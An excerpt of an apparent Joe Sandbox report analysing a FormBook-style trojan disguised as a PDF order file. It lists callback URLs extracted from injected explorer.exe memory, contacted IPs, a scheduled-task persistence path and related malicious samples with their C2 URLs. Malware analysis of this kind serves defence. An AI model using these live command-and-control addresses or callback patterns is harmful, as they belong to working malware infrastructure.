http://www.supporthq.life	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000008.00000000.1442441484.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2285468060.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848687718.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.awvd97.com/ss24/www.supporthq.life	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.awvd97.comReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.head2toe.boutique	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000008.00000000.1442441484.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2285468060.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848687718.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.kucinglucu.online	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.163875.shopReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ygyqpswy.xyz	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8548d.comReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mewtcp.xyzReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000008.00000002.3845273913.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.8548d.com/ss24/www.kucinglucu.online	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mewtcp.xyz/ss24/www.qdfake609am.xyz	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8548d.com/ss24/	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.2025tengxun171.latReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000008.00000002.3844169156.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3831482856.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1431488156.0000000007710000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.qdfake609am.xyz/ss24/www.startable.online	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.realearthpower.com/ss24/	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.qdfake609am.xyzReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8208975.com/ss24/	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.crucka.xyz/ss24/www.awvd97.com	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.startable.online/ss24/www.ygyqpswy.xyz	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ygyqpswy.xyz/ss24/www.163875.shop	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thehalcyon.studio	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mewtcp.xyz/ss24/	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.realearthpower.com/ss24/www.crucka.xyz	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.startable.online	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mewtcp.xyz	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.startable.onlineReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.2025tengxun171.lat/ss24/www.8208975.com	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.head2toe.boutique/ss24/	explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kucinglucu.online/ss24/	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.awvd97.com/ss24/	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thehalcyon.studio/ss24/	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	explorer.exe, 00000008.00000002.3851391138.0000000010A2B000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827151004.00000000049FB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3838560992.00000000051DB000.00000004.10000000.00040000.00000000.sdmp, RFQ31072024_August order_pdf.exe, EqtGqZpPskFq.exe.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.247.228.75	xpj.wj56789.com	United States	40065	CNSERVERSUS	false
103.224.212.212	www.startable.online	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	false
38.150.29.115	qdfake609am.xyz	United States	174	COGENT-174US	true
84.32.84.32	kucinglucu.online	Lithuania	33922	NTT-LT-ASLT	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1485185
Start date and time:	2024-07-31 09:49:48 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	RFQ31072024_August order_pdf.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@27/11@11/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 156 Number of non-executed functions: 335
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:50:40	API Interceptor	1x Sleep call for process: RFQ31072024_August order_pdf.exe modified
03:50:45	API Interceptor	16x Sleep call for process: powershell.exe modified
03:50:48	API Interceptor	1x Sleep call for process: EqtGqZpPskFq.exe modified
03:50:53	API Interceptor	6917353x Sleep call for process: explorer.exe modified
03:51:29	API Interceptor	6411822x Sleep call for process: msiexec.exe modified
09:50:47	Task Scheduler	Run new task: EqtGqZpPskFq path: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.224.212.212	po8909893299832.exe	Get hash	malicious	FormBook	Browse	www.trexendofparadise.club/hd05/?mJBXxJ=86lIbpVB0TF+ypCCh2xJS80hbaRwufvG1BxjW4BS/DAeytVMDvWI/cAJk8pGccQXRyse&_hrl=jxopsZ
	Details of Your Etisalat Summary Bill for the Month of May 2024.exe	Get hash	malicious	FormBook	Browse	www.vietcadao.com/da29/?6l=Q7am8il/nsWle9qVrlpo40N7hUEpDQa8XY45vE38HJwrUpInQsvntdacZL4kVj7U+7+N&2dqhl=R2MlVxP8ert
	jqPZZhDmjh.exe	Get hash	malicious	FormBook	Browse	www.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV
	z2______________________________.exe	Get hash	malicious	FormBook	Browse	www.theanhedonia.com/gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&J61h=CBZhCFnx-
	file.exe	Get hash	malicious	LummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRAT	Browse	soclaiebn.xyz/PhpMyAdmin/
	22#U0415.exe	Get hash	malicious	FormBook	Browse	www.theanhedonia.com/gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58
	RFQ-T56797W_1.xlsx	Get hash	malicious	FormBook, NSISDropper	Browse	www.narrativepages.com/ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41
	GCeHcfCef8.exe	Get hash	malicious	FormBook	Browse	www.fhstbanknigeria.com/rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs
	Audit_Confirmation_pdf.exe	Get hash	malicious	FormBook	Browse	www.brynnwpods.com/ls02/?U2MTG=IjLtFX-X1ru86jf&rrn=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlinyM3iKXNZy
